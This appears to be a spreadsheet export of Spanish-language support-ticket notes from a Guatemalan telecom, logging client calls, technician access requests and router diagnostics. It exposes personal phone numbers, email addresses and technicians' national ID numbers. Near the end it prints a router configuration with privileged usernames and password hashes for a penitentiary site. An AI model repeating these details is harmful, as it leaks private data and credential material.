NÚMERO: 24207212
DURACIÓN: 0:02:21
ESTADO: CONECTADA
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 21/06/2022 15:13:02</t>
  </si>
  <si>
    <t>F4611067</t>
  </si>
  <si>
    <t>CLIENTE VALIDA QUE TODOO ESTA OK ## SE PROCEDE AL CIERRE DEL CASO ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMAA CLIENTE ANA JUDITH LINARES-37635914  SE TIENE EN LINEA ##VIVO</t>
  </si>
  <si>
    <t>F4611093</t>
  </si>
  <si>
    <t>SE VALIDA EL SERVICIO CON EL CLIENTE LANY QUIEN INDICA QUE YA POSEE LLAMADAS EN AMBAS VIAS.</t>
  </si>
  <si>
    <t>F4611105</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ALEJANDRO CEA 78561840 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001609173</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEJANDRO CEA AL 78561840 INDICA QUE VA DE CAMINO AL SITIO SOLICITA QUE SE LE LLAME EN 40 MIN PARA CONFIRMAR  **
-ID 1001591440 - 1001591440
**</t>
  </si>
  <si>
    <t>F4611106</t>
  </si>
  <si>
    <t>F4611108</t>
  </si>
  <si>
    <t>**SE LLAMAA  CLIENTE BRYAN CASTELLANOS 58097654 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO ||
AUTORIZA CIERRE DE TICKET **
-ID 1001649418
**</t>
  </si>
  <si>
    <t>BRYAN CASTELLANOS 58097654 (CLIENTE) INFORMA QUE TUVIERON UNA INTERMITENCIA A LAS 15:20 HRS POR LO QUE SOLICITA SE MANTENGA EN MONITOREO PARA EL DÍA DE MAÑANA A LAS 12:00 HRS -*
-*</t>
  </si>
  <si>
    <t>F4611111</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NELSON 31925430 MENCIONA QUE YA RECIBIO EL CORREO PERO SOLICITA SE COMPARTAN LAS HERRAMIENTAS QUE PERSONAL TECNICO NECESITA INGRESAR
CLIENTE SOLICITA SE ENVIE ESTA INFORMACION POR WHATSAPP POR MEDIO DE PERSONAL HN
-ID 1001511205</t>
  </si>
  <si>
    <t>F4611119</t>
  </si>
  <si>
    <t>SE REVISA COLA DE CORREO AUN NO SE TIENE RESPUESTA DE PARTE DEL CLIENTE
ASUNTO: GESTION DE ACCESOS F4611119 |8901524T | BANRURAL |</t>
  </si>
  <si>
    <t>F4611121</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCIS BALDIZON 87100747 MENCIONA QUE YA NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA PRA MAÑANA A LAS 9:00 HRS
-ID 1001524223</t>
  </si>
  <si>
    <t xml:space="preserve"> CLIENTE FRANCIS BALDIZON 87100747 SE LE SOLICITA REALIZAR PRUEBAS PERO COMENTA QUE AUN NO TIENE CONEXION HACIA INTERNET, SOLICITA APOYO CON VISITA TECNICA PARA CERTIFICAR LA CONEXION HACIA INTERNET Y DEMOSTRAR QUE A NIVEL DE CLARO ESTA BIEN EL ENLACE, ATIENDE DE 09:00 A 5:00PM.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCIS BALDIZON 87100747 MENCIONA QUE EL INCONVENIENTE PERSISTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001573288</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VERONICA ZAPATA 87100726 PERO NO RESPONDE, SE INENTARA LUEGO
-ID 1001524008</t>
  </si>
  <si>
    <t>F4611126</t>
  </si>
  <si>
    <t>SE NOTIFICA ALARMA EN EL MONITOREO PROACTIVO
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM156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1126
ID: 47501503T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM1568
UBICADO EN: KM 164 C-A C.C. PASEO CARNAVAL LOCAL 2-A, MAZATENANGO (INTERIOR SUPERMERCADO LA BARATA FRENTE A CAJA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4611143</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE PEREZ 50322399000 MENCIONA QUE EL INCONVENIENTE ES CON UN EQUIPO INTERNO
-ID 1001693293</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE PEREZ AL 50378471779 /+50322399000 NUMEROS DESCONECTADOS || SE INTENTARA LUEGO **
-ID 1001548977 - 1001548985
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE PEREZ AL 50378471779 - 50322399000  NO SE LOGRA COMUNICACION AL PRIMER NUMERO Y AL SEGUNDO CONTESTA PERO SE CORTA LLAMADA**
-ID 1001621847 - 1001623015
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE PEREZ AL 50378471779 /+50322399000 NO RESPONDE | SE INTENTARA LUEGO **
-ID 1001558062 - 1001558303
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE PEREZ AL 50378471779 /+50322399000 NO RESPONDE EN EL PRIMER NUMERO ENVIA A BUZON EN EL SEGUNDO CONTESTAN TRANSFIEREN LLAMADA PERO IGUAL NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 1001577678 - 1001578201
**</t>
  </si>
  <si>
    <t>F4611144</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN CARLOS GILLEN-42179386 NO CONTESTA ##ENVIA DIRECTO A BUZON ##
2001051716
COLA:
NOMBRE: A: 42179386
NÚMERO: 42179386
DURACIÓN: 0:00:32
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 42179386
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 24/06/2022 10:42:49
2001051880
COLA:
NOMBRE: A: 42179386
NÚMERO: 42179386
DURACIÓN: 0:00:19
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 42179386
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 24/06/2022 10:43:05</t>
  </si>
  <si>
    <t>SE HABAL CON CLIENTE  JUAN CARLOS GILLEN-42179386   INDICA QUE YA APLICO REONICIO PERO SERVICIO NO RESTABLECE- SE LE COMENTA QUE LA INTERFAZ QUE CONECTA A SU PBX  NO ESTA SINCORNIZANDO Y SE OBSERVA UN DRASTICO INCREMENTO DE ERRORES, POR LO QUE SE LE SOLICITA A CLIENTE VERIFICAR LA CONEXION DEL A PBX Y EL CABLEADO ##CLIETNE INDICA QUE VERIFICARA ##SEGUIMIENTO MAÑANA A LAS 10 AM##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN CARLOS GILLEN-42179386  ##NO CONTESTA##ENVIA A BUZON ## SE HAN MARCADO 2 VECES ##VIVO##SE INTENTARA LUEGO</t>
  </si>
  <si>
    <t>SE LLAMA ACLIENTE JUAN CARLOS GILLEN-42179386  SE TIENE EN LINEA ##VIVO</t>
  </si>
  <si>
    <t>SE HA ENVIADO CORREO A CLIENTE ##EN ESPERA DE PERMISOS ##
DE: MARIA ISABEL GODINEZ SAENZ
ENVIADO: JUEVES, 23 DE JUNIO DE 2022 8:53
PARA: JCGUILLEN@SANDIEGO.COM.GT &lt;JCGUILLEN@SANDIEGO.COM.GT&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: GDN 78201700 || COMPAÑIA:SAN DIEGO, S.A
BUEN DÍA ESTIMADO, CON RESPECTO AL E1:
GDN 78201700
COMPAÑIA:SAN DIEGO, S.A.
KM 69.5 LOTE 30 CARRETERA VIEJA A PUERTO SAN JOSE CASERIO LOS LIRIOS MASAGUA ESCUINTLA ESCUINTLA MAS
SOLICITO SU AMABLE APOYO PARA TRAMITAR LOS PERMISOS CORRESPONDIENTES HACIA NUESTROS TÉCNICOS, PARA LA ATENCIÓN DEL DÍA DE MAÑANA.
 AXEL DANILO ZARPEC SAZO DPI: 1624525270501
 MILTON DAVID MORATAYA GONZALEZ DPI: 2277084580501
QUEDAMOS PENDIENTES A SUS COMENTARIOS,
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>## SE HABLA CONC LINETE  JUAN CARLOS GILLEN-42179386 INDICA QUE CAMBIO DE PATCHCORD ## SE SIGUEN OBSERVANDO ERRORES, INCREMENTAN PERO YA NO COMO ANTES ##CLIENTE SOLICITA CERTIFICACION PARA MAÑANA 8 AM ##VIVO
SAN_DIEGO\ISDN\ISDN-PRI1&gt;&gt;SHOW STATUS -S
STATUS OF ISDN-PRI1 INTERFACE
LAYER 1 STATUS   : UP
LAYER 1 UP COUNT : 7932845
LAYER 1 UP TIME  : 0H 00M 00S
LAYER 2 STATUS   : UP
B CHANNELS IN USE: NONE
COMMAND EXECUTED
SAN_DIEGO\ISDN\ISDN-PRI1&gt;&gt;
SAN_DIEGO\ISDN\ISDN-PRI1&gt;&gt;SHOW STATUS -S
STATUS OF ISDN-PRI1 INTERFACE
LAYER 1 STATUS   : UP
LAYER 1 UP COUNT : 7951347
LAYER 1 UP TIME  : 0H 00M 00S
LAYER 2 STATUS   : DOWN
B CHANNELS IN USE: NONE
COMMAND EXECUTED
SAN_DIEGO\ISDN\ISDN-PRI1&gt;&gt;</t>
  </si>
  <si>
    <t>POR LA HORA, CLIENTE SE HA RETIRADO DE LAS INSTALACIONES ##SE DA SEGUIIENTO MAÑANA EN HORARIO HABIL DE CL ##</t>
  </si>
  <si>
    <t>AUN NO SE OBSERVAN PERMISOS CONFIRMADOS. SE LLAMA A CLIENTE JUAN CARLOS GILLEN-42179386 ## VIVO #SE LLAMA 2 VECES A CLIENTE, ENVIA DIRECTO A BUZON ##SE INTENTARA LUEGO</t>
  </si>
  <si>
    <t>SE LLMAA A LCIENTE JUAN CARLOS GILLEN-42179386 3 VECES###ENVIA DIRECTO A BUZON ##SE INTENTARA LUEGO ##VIVO</t>
  </si>
  <si>
    <t>F4611146</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
ATIENDE ROSMERY QUIEN INDICA QUE YA POSEE LLAMADAS.
SOLICITA QUE SE LE LLAME A LAS 17:00HRS PARA VALIDAR EL SERVICO.
LLAMADA DESDE VIVO.</t>
  </si>
  <si>
    <t>F4611155</t>
  </si>
  <si>
    <t>CLIENTE IVON CASTELLANOS 50004426 REALIZA PRUEBAS DE LLAMADA Y VALIDA EL E1 ACTIVO. AUTORIZA EL CIERRE DEL CASO. ID DE LLAMADA: 1001569893</t>
  </si>
  <si>
    <t>F4611171</t>
  </si>
  <si>
    <t>EN ESPERA DE CONFIRMACION DE CLIENTE
REPORTANDO| AVIANCA * GUATEMALA * MULTIPLE CIRCUIT * CID 162668 &amp; 436985 &amp; 437182 * DOWN * INC000003778356</t>
  </si>
  <si>
    <t>F4611172</t>
  </si>
  <si>
    <t>SE LLAMAA CLEINTE CRISTIAN FIGUEROA-56956114 ## COEMTNA QUE LO QUE REPORTA ES INESTABILIDAD## SE MANTENDRA SERVICIO REALIZANDO PRUEBAS ##
##VIVO
##SE LLAAMRA A CLIENTE EN 1 HORA ## A NIVEL DE CLARO TODO OK</t>
  </si>
  <si>
    <t>F4611175</t>
  </si>
  <si>
    <t>ENLACE OPERATIVO, REPORTE FUE CAIDA TOTAL, SE ENVIA CORREO A CLIENTE CON EVIDENCIA DEL ENLACE OPERATIVO Y ETABLE, SE PROCEDE AL CIERRE DEL INCIDENTE. ESTIMADOS VALIDAR MEDIANTE SD.</t>
  </si>
  <si>
    <t>F4611186</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NARDA RAMOS  41516648 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001641805</t>
  </si>
  <si>
    <t>SE ENVIO CORREO AL CLIENTE.
SE DARA SEGUIMIENTO EL DIA DE MAÑANA CON LA WO.
BUENAS TARDES,
ESTIMADOS POR ESTE MEDIO SOLICITO DE SU APOYO CON EL INGRESO A LA AGENCIA.
BCO INDUSTRIAL ZONA 3 COLONIA EL RECREO  GDN 77908700
PARA REVISIÓN DEL E1 TELEFÓNICO.
ADJUNTO ARCHIVO CON LOS DATOS DE LOS TECNICOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4611207</t>
  </si>
  <si>
    <t>***--- SE RESPONDE CORREO AL CLIENTE --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MIÉRCOLES, 22 DE JUNIO DE 2022 04:50
PARA: SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: NEW RFO TT // PROSEGUR // BGP DOWN // TGS TT: INC000003778902 // PROVIDER TT:
BUENOS DÍAS ESTIMADO SR. LUIS FERNANDO.
                RESPECTO A SU SOLICITUD, EFECTIVAMENTE FUERON SOLICITADOS ESTOS DETALLES DENTRO DEL MISMO.
ESPERAMOS ESTAR COMPARTIENDO EL DOCUMENTO AL MOMENTO DE FINALIZAR SU ELABORACIÓN POR PARTE DE LOS COMPAÑEROS.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: SMC RECOVERY EMEA BUSINESS SOLUTIONS [MAILTO:SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM]
ENVIADO EL: MIÉRCOLES, 22 DE JUNIO DE 2022 04:43
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;
ASUNTO: RE: NEW RFO TT // PROSEGUR // BGP DOWN // TGS TT: INC000003778902 // PROVIDER TT:
ESTIMADA SOFIA
MUCHAS GRACIAS POR LA INFORMACIÓN. RECORDAD DE INCLUIR LOS SIGUIENTES DETALLES AL INFORME:
CAUSAS DE LA FALLA:
UBICACIÓN DEL TRAMO DE LA FALLA:
SOLUCIÓN DE LA FALLA:
PENDIENTE DE RECIBIR DICHA INFORMACIÓN
SALUDOS
LUIS FERNANDO DE LA CRUZ
CUSTOMER OP. &amp; TECH ¿ INCIDENT MANAGEMENT NETWORKING EMEA</t>
  </si>
  <si>
    <t>F4611208</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAVEN ALVAREZ AL 22790909  CONTESTA EL SEÑOR MARVIN CONFIRMA SERVICIO ESTABLE Y AUTORIZA CIERRE DE TICKET **
-ID 1001549394
**</t>
  </si>
  <si>
    <t>F4611212</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER ALVAREZ 51207915 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001556436</t>
  </si>
  <si>
    <t>F4611215</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE WILMER GABRIEL-32134313 INDICA QUE LE MARCA ERROR SU REGISTRO, COMENTA QUE YA VERIFICO CREDENCIALES Y NO UBICA PROBLEMAS + INDICA QUE TIENE UN FIREWALL ENTRE  CTC Y SU PBX- ADEMAS INDICA QUE YA VERIFICO SU FIREWALL Y NO UBICA NINGUN TIPO DE DESCONFIGURACION, CLIENTE SOLICITA CERTIFICACION DE SERVICIO PARA MAÑANA.  SE LE CONSULTA SOBRE CREDENCIALES E INDICA QUE SE LE MARQUE EN 15 MINUTOS ## PARA CONFIRMAR QUE LAS POSEA##VIVO</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE WILMER GABRIEL QUIEN INDICA QUE SI TIENE LAS CREDENCIALES DEL SERVICIO Y QUE LA VISITA ES PARA EL DIA DE MAÑANA A LAS 8:00AM
FAVOR DE LLEVAR LAPTOP PARA CERTIFICAR.
1001519288
COLA:
NOMBRE: A: 32134313
NÚMERO: 011 50232134313
DURACIÓN: 0:00:54
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: +50232134313
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 21/06/2022 17:36:05</t>
  </si>
  <si>
    <t>F4611221</t>
  </si>
  <si>
    <t>F4611236</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  CARLOS DIAZ 22399702 NO RESPONDE || OPERADORA INDICA QUE EN ESTE MOMENTO NO HAY NADIE QUE PUEDA ATENDER LA LLAMADA SE INTENTARA LUEGO **
-ID 1001647523
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  CARLOS DIAZ 22399702 NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001555306
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  CARLOS DIAZ 22399702 NO RESPONDE || OPERADORA INDICA QUE EN ESTE MOMENTO NO HAY NADIE QUE PUEDA ATENDER LA LLAMADA SE INTENTARA LUEGO **
-ID 1001586792
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS DIAZ 22399702 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001739251</t>
  </si>
  <si>
    <t>F4611239</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ELVIA RIVERA 59503681 PARA VALIDAR EL INCONVENIENTE SOLICITA QUE SE COMUNIQUE CON EL DELEGADO DE QUETZALTENANGO YA QUE ELLA ES DE UNA SUBDELEGACIÓN Y NO ES DE ESA SEDE. BRINDA CONTACTO 55108629 JUAN HERRERA. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4611240</t>
  </si>
  <si>
    <t>*/*/*/SE COMUNICA CLIENTE MAURICIO NAVARRETE PARA INFORMAR QUE YA TIENE EL UPS NUEVO QUE SE LE SOLICITÓ, TAMBIÉN YA ENVÍO LAS FOTOGRAFÍAS QUE SE LE SOLICITARÓN, SE PROCEDE A CONTACTAR A GESTOR MIGUELAN.RODRIGUEZ 5147 ID: 1001939351 LOCUCIÓN INDICA QUE NO ESTA DISPONIBLE, SE CONTACTA A CNOC ID: 1001939786 SE DEJA EN CONFERENCIA CLIENTE/GESTOR*/*/*/</t>
  </si>
  <si>
    <t>F4611242</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE CLIENTE OSCAR OCHOA 72030424 INFORMA QUE LOS EQUIPOS ESTAN ENCENDIDOS, SOLICITA LA VISITA PARA MAÑANA MIERCOLES 7AM. SE PROCEDE A SOLICITAR APOYO PARA LA REVISION PRIMERO DESDE EL NODO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ARTURO LARIN 77974705 NO CONTESTO IVR ENVIA A BUZON, ID: 1001520217.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ARTURO LARIN 72030424  NO CONTESTO, IVR ENVIA A BUZON, ID: 1001520057.</t>
  </si>
  <si>
    <t>F4611246</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS DIAZ AL 22399702 NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001561058
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS DIAZ AL 22399702 NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001550494
**</t>
  </si>
  <si>
    <t>F4611252</t>
  </si>
  <si>
    <t>SE LLAMA A LCIENTE YADIRA GALINDO 31860427 ## VIVO ##   CLIENTE QUEDA SATISFECHA CON LO REALIZADO, CLIENTE TAMBIEN  EXPLICA QUE EL PROBLEMA ES QUE NO TIENE INTERNET Y SU PBX FUNCIONA CON INTERNET. ENTONCES QUE AUN NO RESTABELCE EL INTERNET Y POR ESO NO TIENE LLAMAAS ##VALIDA CIERRE##VIVO</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA YADIRA GALINDO 31860427 COMETNA QUE EL TEELFONO ESTA TOTALMENTE MUERRTO ## ETA DIRIGIEINDOSE A EQUIPOS PARA REINICIAR PBX
 1001590674
COLA:
NOMBRE: A: 0050431860427
NÚMERO: 0050431860427
DURACIÓN: 0:03:23
ESTADO: CONECTADA
DETALLES: 0050431860427
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 22/06/2022 10:00:09</t>
  </si>
  <si>
    <t>CLIENTE APLICA REINICIO A PBX PERO PBX NO LE DA TONO PARA REALIZAR LLAMADAS# CLIENTE EXIGE CERTIFICACION YQ UE SE DEMUESTRE QUE EL PROBLEMA ES SU PBX##</t>
  </si>
  <si>
    <t>SE LLAMA A LCIENTE YADIRA GALINDO 31860427 ## 3 VECES## NO CONTESTA ### ACTUALMENTE ES PARA CONFIRMAR SI YA RESTABLECIO SU SERVICIO DE INTERNET + CONSULTARLE SI PODEMOS LLEGAR EL DIA DE HOY ##VIVIO</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE YADIRA GALINDO 31860427 PERO INDICA QUE YA SE RETIRO DE SUS INSTALACIONES, SOLICITA QUE SE RETOME EL SEGUIMIENTO EL DÍA DE MAÑANA A LAS 8:00 AM
1001522577
COLA:
NOMBRE: A: 0050431860427
NÚMERO: 0050431860427
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DURACIÓN: 0:01:45
DETALLES: 0050431860427
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 21/06/2022 17:52:36</t>
  </si>
  <si>
    <t>F4611270</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SERGIO BARRERA AL 56300178 NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 1001562649
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SERGIO BARRERA AL 56300178 NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001550731
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SERGIO BARRERA AL 56300178 CONTESTA INDICA QUE ESTA EN OTRA LLAMADA Y CORTA LA LLAMADA   **
-ID 1001588193
**</t>
  </si>
  <si>
    <t>F4611275</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OMAR MARTINEZ  83303074 MENCIONA QUE ESTARA VALIDANDO OTRO CONTACTO POR LO QUE SOLICITA LLAMADA EN 10 MIN
-ID 1001522570</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OMAR MARTINEZ  83303074 PERO NO RESPONDE
-ID 1001526368</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DETXER PEREZ 85994537 PERO ENVIA DIRECTO A BUZON
-ID 1001522056</t>
  </si>
  <si>
    <t>F4611283</t>
  </si>
  <si>
    <t>###SE DEJA PROGRAMADA LA WO PARA LA HORA ACORDADA CON CLIENTE Y SE LE MANDA CORREO ##
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 23 DE JUNIO DE 2022 13:29
PARA: BYRON ESCOBAR &lt;SOPORTE@HELADOSARITA.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; GABRIEL RODRÍGUEZ &lt;GRODRIGUEZ@HELADOSARITA.COM&gt;; CAROLINA MEJIA ELIAS &lt;CAROLINA.MEJIA@CLARO.COM.GT&gt;; JUAN CARLOS AILON &lt;JCAILON@HELADOSARITA.COM&gt;; JUAN CARLOS MARTINEZ &lt;ADMRIDTIOFCGT@HELADOSARITA.COM&gt;
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UNTO: RE: ENLACE CLARO - DISAR (SARITA)
MUY BUENAS TARDES ESTIMADOS.
LA VISITA COORDINADA PARA LAS 14:30 PM ES PARA REALIZAR UNA CERTIFICACIÓN DEL ENLACE.  SIEMPRE GRACIAS POR EL APOYO BRINDADO.
SALUDOS</t>
  </si>
  <si>
    <t>###SE MANDA CORREO AL CLIENTE PARA GESTIONAR LOS PERMISOS##
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: JUEVES, 23 DE JUNIO DE 2022 9:51
PARA: SISTEMAS@HELADOSARITA.COM &lt;SISTEMAS@HELADOSARITA.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | 249600029T |DISAR S.A. |INTERNET.- 3 AVENIDA 9-90 ZONA 13 PAMPLONA
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO 249600029T |DISAR S.A.  |INTERNET.- 3 AVENIDA 9-90 ZONA 13 PAMPLONA
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICOS:
MARLON ENRIQUE MUÑOZ ORELLANA          652515        1582 46500 1801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QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN CARLOS MARTINEZ 58588670 MENCIONA QUE ESTARA RESPONDIENDO EL CORREO CON LOS PERMISOS
-ID 1001848539</t>
  </si>
  <si>
    <t>F4611309</t>
  </si>
  <si>
    <t xml:space="preserve">SE LLAMA AL CLIENTE SR. NELSON Y SOLICITA CERTIFICACION DEL ENLACE, DEBIDO A QUE AUN DETECTA INCONVENIENTES
HORARIO: LO MAS PRONTO
DIRECCION: PENITENCIARIA DE EL PORVENIR, CARRETERA A ALDEA EL PORVENIR, 6KM ANTES DE LLEGAR AL PUEBLO.
ACCESOS: COMUNICACION DE TECNICOS CON EL CLIENTE NELSON 31925430 VIA WHATSAPP
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 4 DÍAS.
CISCO IOS SOFTWARE, C860 SOFTWARE (C860VAE-ADVSECURITYK9-M), VERSION 15.3(2)T3, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2014 BY CISCO SYSTEMS, INC.
COMPILED WED 05-MAR-14 05:14 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.1(4R)M3, RELEASE SOFTWARE (FC1)
CSC867_IN01MB_NCIC-ELPORVENIR_EPR01_1017843 UPTIME IS 4 DAYS, 7 HOURS, 53 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "FLASH:C860VAE-ADVSECURITYK9-MZ.153-2.T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211500EG
1 DSL CONTROLLER
1 ETHERNET INTERFACE
4 FASTETHERNET INTERFACES
2 GIGABIT ETHERNET INTERFACES
1 ATM INTERFACE
1 VIRTUAL PRIVATE NETWORK (VPN) MODULE
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
57344K BYTES SYSTEM FLASH ALLOCATED
CONFIGURATION REGISTER IS 0X2102
CSC867_IN01MB_NCIC-ELPORVENIR_EPR01_1017843#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 2201 BYTES
!
! LAST CONFIGURATION CHANGE AT 22:14:21 UTC TUE JUN 21 2022 BY CLARO
VERSION 15.3
NO SERVICE PAD
SERVICE TIMESTAMPS DEBUG DATETIME MSEC
SERVICE TIMESTAMPS LOG DATETIME MSEC
NO SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CSC867_IN01MB_NCIC-ELPORVENIR_EPR01_1017843
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
!
NO AAA NEW-MODEL
WAN MODE ETHERNET
!
!
!
!
!
!
IP CEF
NO IPV6 CEF
!
!
!
!
!
!
!
USERNAME CLARO PRIVILEGE 15 SECRET 5 $1$B8FO$OM2DJZPGLY8GRCMIZXAFQ0
USERNAME SERCOM PRIVILEGE 15 SECRET 5 $1$E1ZG$FHS4Q4XGAMNPD.21ICRV6.
!
!
CONTROLLER VDSL 0
 SHUTDOWN
!
!
!
!
!
!
!
!
!
!
!
!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NO IP ADDRESS
 LOAD-INTERVAL 30
 DUPLEX AUTO
